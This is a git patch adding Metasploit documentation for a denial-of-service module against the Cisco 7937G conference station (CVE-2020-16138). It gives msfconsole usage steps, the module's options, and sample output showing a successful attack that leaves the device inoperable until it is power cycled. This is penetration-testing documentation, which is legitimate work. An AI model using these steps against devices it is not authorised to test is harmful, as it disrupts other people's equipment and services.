From b461f4ede89cd4259df3338aba3b5bd7e4112ef4 Mon Sep 17 00:00:00 2001 From: debifrank Date: Thu, 13 Aug 2020 09:56:30 -0400 Subject: [PATCH] Add files via upload Linted with msftidy_docs.rb --- .../auxiliary/dos/cisco/CVE-2020-16138.md | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md diff --git a/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md new file mode 100644 index 0000000000..a6452fd4b2 --- /dev/null +++ b/documentation/modules/auxiliary/dos/cisco/CVE-2020-16138.md @@ -0,0 +1,47 @@ +## Vulnerable Application + + 1. Obtain a Cisco 7937G Conference Station. + 2. Enable SSH Access on the device. + 3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use auxiliary/dos/cisco/CVE-2020-16138` + 3. Do: `set RHOST 192.168.1.10` + 4. Do: `run` + 5. The conference station should now be inoperable until it is power cycled + +## Options + + 1. rhost (required) - Target addres + 2. timeout (not required) - Timeout in seconds to wait before aborting + +## Scenarios + +#### Successful Scenario: +``` +[*] Starting server... +[*] 192.168.110.209 - Connected (version 2.0, client OpenSSH_4.3) +[-] 192.168.110.209 - Exception: Incompatible ssh peer (no acceptable kex algorithm) +[-] 192.168.110.209 - Traceback (most recent call last): +[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2083, in run +[-] 192.168.110.209 - self._handler_table[ptype](self, m) +[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2198, in _negotiate_keys +[-] 192.168.110.209 - self._parse_kex_init(m) +[-] 192.168.110.209 - File "/usr/lib/python3/dist-packages/paramiko/transport.py", line 2354, in _parse_kex_init +[-] 192.168.110.209 - raise SSHException( +[-] 192.168.110.209 - paramiko.ssh_exception.SSHException: Incompatible ssh peer (no acceptable kex algorithm) +[-] 192.168.110.209 - +[*] 192.168.110.209 - DoS non-reset attack completed! +[*] 192.168.110.209 - Errors are intended. +[*] 192.168.110.209 - Device must be power cycled to restore functionality. +[*] Auxiliary module execution completed +``` + +#### Unsuccessful Scenario: +``` +[*] Starting server... +[-] 192.168.110.209 - Device doesn't appear to be functioning (already DoS'd?) or SSH is not enabled. +[*] Auxiliary module execution completed +```